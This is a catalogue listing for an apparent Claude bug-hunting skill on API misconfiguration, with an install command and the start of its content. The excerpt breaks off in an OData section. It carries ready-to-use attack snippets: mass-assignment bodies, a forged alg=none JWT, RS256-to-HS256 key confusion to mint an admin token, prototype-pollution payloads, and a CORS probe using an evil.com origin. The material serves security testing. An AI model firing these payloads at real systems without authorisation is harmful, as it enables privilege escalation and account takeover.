← ClaudeAtlas

hunt-api-misconfiglisted

Hunt API security misconfiguration — mass assignment, JWT attacks, prototype pollution, CORS, HTTP verb tampering. Mass assignment: send {is_admin:true, role:admin, verified:true} on profile/account/reset endpoints — server blindly applies. JWT: alg=none, weak HMAC bruteforce, kid path traversal, JWK injection, token confusion. Prototype pollution: __proto__ injection in JSON merge / Object.assign / lodash _.merge → polluted prototype reaches sink (RCE in Node, XSS in browser). CORS: wildcard with credentials, null origin, regex with subdomain takeover, postMessage origin checks. HTTP verb: GET-bypass-CSRF, X-HTTP-Method-Override, TRACE enabled. Detection: API responses with extra fields, JWTs in headers (decode at jwt.io), CORS preflight responses. Use when hunting API misconfigs, JWT flaws, mass-assignment, prototype pollution, CORS bypasses.
elementalsouls/Claude-BugHunter · ★ 1,478 · API & Backend · score 83
Install: claude install-skill elementalsouls/Claude-BugHunter
## 12. API SECURITY MISCONFIGURATION ### Mass Assignment ```javascript User.update(req.body) // body has {"role": "admin"} → privilege escalation ``` ### JWT None Algorithm ```python header = {"alg": "none", "typ": "JWT"} payload = {"sub": 1, "role": "admin"} token = base64(header) + "." + base64(payload) + "." # no signature ``` ### JWT RS256 → HS256 Algorithm Confusion ```python # Get server's public key from /.well-known/jwks.json # Sign token with public key as HMAC secret token = jwt.encode({"sub": "admin", "role": "admin"}, pub_key, algorithm="HS256") # Server uses RS256 key as HS256 secret → accepts it ``` ### Prototype Pollution ```javascript // Server-side — Node.js merge without protection {"__proto__": {"admin": true}} {"constructor": {"prototype": {"admin": true}}} // URL: ?__proto__[isAdmin]=true&__proto__[role]=superadmin ``` ### CORS Exploitation ```bash # Test: reflected origin + credentials curl -s -I -H "Origin: https://evil.com" https://target.com/api/user/me # If: Access-Control-Allow-Origin: https://evil.com + Access-Control-Allow-Credentials: true # → CRITICAL: attacker reads credentialed responses ``` --- ## OData $filter / $select / $expand WAF-Blacklist Bypass (2024-2026 surface) OData (Open Data Protocol) is the query layer behind **SharePoint, Microsoft Dynamics 365 / Power Platform, SAP NetWeaver Gateway / Fiori,** and any ASP.NET WebAPI project using `Microsoft.AspNetCore.OData`. It exposes SQL-shaped query operators (`eq`, `ne`, `and`,